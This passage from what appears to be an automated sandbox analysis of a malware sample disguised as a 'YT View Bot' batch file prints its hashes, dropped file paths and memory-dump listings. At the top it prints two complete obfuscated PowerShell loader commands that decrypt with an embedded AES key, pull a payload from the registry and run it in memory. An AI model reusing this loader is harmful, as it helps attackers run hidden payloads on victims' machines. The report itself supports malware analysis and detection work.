System.IO.Compression.GZipStream($GUtCq, [IO.Compression.CompressionMode]::$tagqY1);$RfNsM.$rruSG($opLWn);$RfNsM.Dispose();$GUtCq.Dispose();$opLWn.Dispose();$DfRTn = $opLWn.ToArray();$SHskK = $dHUnA | IEX;$jcubt = $SHskK::$tagqY2($DfRTn);$boBJt = $jcubt.EntryPoint;$boBJt.$tagqY0($null, (, [string[]] ($gPqLf)))
4⤵
PID:3340

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1616).WaitForExit();[System.Threading.Thread]::Sleep(5000); $pipZR1 = New-Object System.Security.Cryptography.AesManaged;$pipZR1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pipZR1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pipZR1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aNJzU0Wh7kY9rwzBT78oJ1wiloTq/+RRntIBAfDfENg=');$pipZR1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S6Pq+md1iAIgVNcHsxgM8w==');$XdDki = $pipZR1.('rotpyrceDetaerC'[-1..-15] -join '')();$tagqY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5ustVY8Pqgcg1xlNi8JTVg==');$tagqY = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY, 0, $tagqY.Length);$tagqY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY);$xIjmq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wHPva9FzqB309fr6XnRPr7I62/D5SEcAeyEieU2SaJ4=');$xIjmq = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xIjmq, 0, $xIjmq.Length);$xIjmq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xIjmq);$gPqLf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5fR/Q0c/Mb9uImXigsnEjQ==');$gPqLf = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gPqLf, 0, $gPqLf.Length);$gPqLf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gPqLf);$dHUnA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('G/j1UyVuWVLkONhVTV7UGAb0buavSZnXzC8N/ybdX47f37JNz11yQo78ioiSjDGt+SKNfpjKrgqerIig4u27+IM/r0RlqLI8KyhPDDG2JsaU/RPQVYfFKZLqfQkLpClUd7e8YrijBu2ZR5M/SGLaXuqIYAGyqNLG82LuwyD/BwSp3QxF4qL6tfdQhLYdB0s+kJy+dKlksNaRpdk8DVXK6DYqbqlF2JZ8s6XawhjUPUWK5RcH4qVETNvJkIP9KnuwAZezWhHR50GUN37srEpEC6R2YmckmoY/OvSxSrZ0xTpYk9hw5YE/oLjlh5SAr7r0JutSb2B/vxZy6ueGswMyvabHustF6ViBCgxPbcvdp/ChFw0J0+7ckb4TpJkA/LE575/mSgKPWnqwduG9OdpUgdnDUYxbbrE7NnJKhf4N9mE=');$dHUnA = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dHUnA, 0, $dHUnA.Length);$dHUnA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dHUnA);$XIjgA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oaNzpE4XcEVHbcUwG0kf5A==');$XIjgA = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XIjgA, 0, $XIjgA.Length);$XIjgA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XIjgA);$ZiATm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vR2jKV8WZ/w6qkVXDGyXeA==');$ZiATm = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZiATm, 0, $ZiATm.Length);$ZiATm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZiATm);$yTemZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6yGizSo/R7vdodR0NDP7mA==');$yTemZ = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($yTemZ, 0, $yTemZ.Length);$yTemZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($yTemZ);$IgEqc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uzvi7i/DzE7DeWIJ2N1ZFA==');$IgEqc = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IgEqc, 0, $IgEqc.Length);$IgEqc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IgEqc);$rruSG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sU+qCTuVJ33RG/fWqLIbkA==');$rruSG = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($rruSG, 0, $rruSG.Length);$rruSG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($rruSG);$tagqY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CmzcSesKmuZCi9P/dkHwMQ==');$tagqY0 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY0, 0, $tagqY0.Length);$tagqY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY0);$tagqY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('InjIvNLletDRj5mJPHa4yA==');$tagqY1 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY1, 0, $tagqY1.Length);$tagqY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY1);$tagqY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('htBQz3KYDcinqLlq2xKUnA==');$tagqY2 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY2, 0, $tagqY2.Length);$tagqY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY2);$tagqY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MHWBRZszc3VVpAvjONe/Wg==');$tagqY3 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY3, 0, $tagqY3.Length);$tagqY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY3);$XdDki.Dispose();$pipZR1.Dispose();$AJZmu = [Microsoft.Win32.Registry]::$IgEqc.$yTemZ($tagqY).$ZiATm($xIjmq);$DfRTn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($AJZmu);$pipZR = New-Object System.Security.Cryptography.AesManaged;$pipZR.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pipZR.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pipZR.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aNJzU0Wh7kY9rwzBT78oJ1wiloTq/+RRntIBAfDfENg=');$pipZR.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S6Pq+md1iAIgVNcHsxgM8w==');$FnrzO = $pipZR.('rotpyrceDetaerC'[-1..-15] -join '')();$DfRTn = $FnrzO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DfRTn, 0, $DfRTn.Length);$FnrzO.Dispose();$pipZR.Dispose();$GUtCq = New-Object System.IO.MemoryStream(, $DfRTn);$opLWn = New-Object System.IO.MemoryStream;$RfNsM = New-Object System.IO.Compression.GZipStream($GUtCq, [IO.Compression.CompressionMode]::$tagqY1);$RfNsM.$rruSG($opLWn);$RfNsM.Dispose();$GUtCq.Dispose();$opLWn.Dispose();$DfRTn = $opLWn.ToArray();$SHskK = $dHUnA | IEX;$jcubt = $SHskK::$tagqY2($DfRTn);$boBJt = $jcubt.EntryPoint;$boBJt.$tagqY0($null, (, [string[]] ($gPqLf)))
4⤵
PID:1040

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\YT View Bot.bat.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\YT View Bot.bat.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
memory/624-205-0x00007FF97CD10000-0x00007FF97CD20000-memory.dmp

Filesize
64KB

Download
memory/1040-186-0x0000000000000000-mapping.dmp

Download
memory/1040-197-0x00007FF99EA80000-0x00007FF99F541000-memory.dmp

Filesize
10.8MB

Download
memory/1616-149-0x0000000000000000-mapping.dmp

Download
memory/1616-191-0x0000018275E00000-0x0000018275FC2000-memory.dmp

Filesize
1.8MB

Download
memory/1616-151-0x00007FF99EA80000-0x00007FF99F541000-memory.dmp

Filesize
10.8MB

Download
memory/1616-152-0x00007FF9BCC90000-0x00007FF9BCE85000-memory.dmp

Filesize
2.0MB

Download
memory/1616-153-0x00007FF9BB070000-0x00007FF9BB12E000-memory.dmp

Filesize
760KB

Download
memory/1616-198-0x00007FF9BCC90000-0x00007FF9BCE85000-memory.dmp

Filesize
2.0MB

Download
memory/1616-195-0x00007FF9BCC90000-0x00007FF9BCE85000-memory.dmp

Filesize
2.0MB

Download
memory/1616-189-0x0000018275A60000-0x0000018275AB0000-memory.dmp

Filesize
320KB

Download
memory/1616-158-0x00007FF9BCC90000-0x00007FF9BCE85000-memory.dmp

Filesize
2.0MB

Download
memory/1616-159-0x00007FF9BB070000-0x00007FF9BB12E000-memory.dmp

Filesize
760KB

Download
memory/1616-160-0x00007FF9BCC90000-0x00007FF9BCE85000-memory.dmp

Filesize
2.0MB

Download
memory/1616-162-0x00007FF9BCC90000-0x00007FF9BCE85000-memory.dmp

Filesize
2.0MB

Download
memory/1616-190-0x0000018275B70000-0x0000018275C22000-memory.dmp

Filesize
712KB

Download
memory/1916-170-0x0000000000000000-mapping.dmp

Download
memory/1916-184-0x00007FF99EA80000-0x00007FF99F541000-memory.dmp

Filesize
10.8MB

Download
memory/2276-141-0x0000000140000000-0x000000014018B000-memory.dmp

Filesize
1.5MB

Download
memory/2276-148-0x0000000140000000-0x000000014018B000-memory.dmp

Filesize
1.5MB

Download
memory/2276-142-0x000000014006914D-mapping.dmp

Download
memory/2276-147-0x0000000140000000-0x000000014018B000-memory.dmp

Filesize
1.5MB

Download
memory/2276-144-0x0000000140000000-0x000000014018B000-memory.dmp

Filesize
1.5MB

Download
memory/2276-143-0x0000000140000000-0x000000014018B000-memory.dmp

Filesize
1.5MB

Download
memory/3340-183-0x0000000000000000-mapping.dmp

Download
memory/3588-163-0x0000000000000000-mapping.dmp

Download
memory/3588-169-0x00007FF99EA80000-0x00007FF99F541000-memory.dmp

Filesize
10.8MB

Download
memory/3764-199-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/3764-202-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/3764-200-0x0000000140002208-mapping.dmp

Download
memory/3764-204-0x00007FF9BB070000-0x00007FF9BB12E000-memory.dmp

Filesize
760KB

Download
memory/3764-203-0x00007FF9BCC90000-0x00007FF9BCE85000-memory.dmp

Filesize
2.0MB

Download
memory/4020-154-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download
memory/4020-155-0x0000000140001000-mapping.dmp

Download
memory/4020-157-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download
memory/4100-135-0x00007FF99EA80000-0x00007FF99F541000-memory.dmp

Filesize
10.8MB

Download
memory/4100-138-0x00007FF9BB070000-0x00007FF9BB12E000-memory.dmp

Filesize
760KB

Download
memory/4100-137-0x00007FF9BCC90000-0x00007FF9BCE85000-memory.dmp

Filesize
2.0MB

Download
memory/4100-145-0x00007FF9BCC90000-0x00007FF9BCE85000-memory.dmp

Filesize
2.0MB

Download
memory/4100-134-0x00000175FB620000-0x00000175FB642000-memory.dmp

Filesize
136KB

Download
memory/4100-132-0x0000000000000000-mapping.dmp

Download
memory/4100-182-0x00007FF99EA80000-0x00007FF99F541000-memory.dmp

Filesize
10.8MB

Download
memory/4100-146-0x00007FF9BB070000-0x00007FF9BB12E000-memory.dmp

Filesize
760KB

Download
memory/4100-139-0x00007FF9BCC90000-0x00007FF9BCE85000-memory.dmp

Filesize
2.0MB

Download
memory/4120-173-0x00007FF99EA80000-0x00007FF99F541000-memory.dmp

Filesize
10.8MB

Download
memory/4120-167-0x0000000000000000-mapping.dmp

Download
memory/4368-165-0x0000000000000000-mapping.dmp

Download
memory/4368-172-0x00007FF99EA80000-0x00007FF99F541000-memory.dmp

Filesize
10.8MB

Download
memory/4648-174-0x0000000000000000-mapping.dmp

Download
memory/4648-188-0x00007FF99EA80000-0x00007FF99F541000-memory.dmp

Filesize
10.8MB

Download
memory/4752-194-0x00007FF99EA80000-0x00007FF99F541000-memory.dmp

Filesize
10.8MB

Download
memory/4752-180-0x0000000000000000-mapping.dmp

Download
memory/4836-193-0x00007FF99EA80000-0x00007FF99F541000-memory.dmp

Filesize
10.8MB

Download
memory/4836-178-0x0000000000000000-mapping.dmp

Download
memory/4864-192-0x00007FF99EA80000-0x00007FF99F541000-memory.dmp

Filesize
10.8MB

Download
memory/4864-176-0x0000000000000000-mapping.dmp

Download